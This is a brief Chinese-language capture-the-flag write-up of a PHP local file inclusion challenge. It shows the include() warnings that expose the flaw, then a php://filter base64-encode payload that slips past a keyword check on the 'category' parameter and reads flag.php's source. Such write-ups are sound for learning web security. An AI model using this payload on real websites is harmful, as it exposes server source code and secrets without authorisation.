打开题目,发现可疑网址
index.php?category=woofers
测试参数时发现可能存在后缀为php
的文件包含
index.php?category=woofers%20a
Warning: include(woofers a.php): failed to open stream: No such file or directory in /var/www/html/index.php on line 37
Warning: include(): Failed opening ‘woofers a.php’ for inclusion (include_path=’.:/usr/local/lib/php’) in /var/www/html/index.php on line 37
且服务端会检测参数category
中是否含有woofers
或meowers
尝试绕过并读取flag.php
index.php?category=php://filter/convert.base64-encode/woofers/resource=flag
获得flag.php源码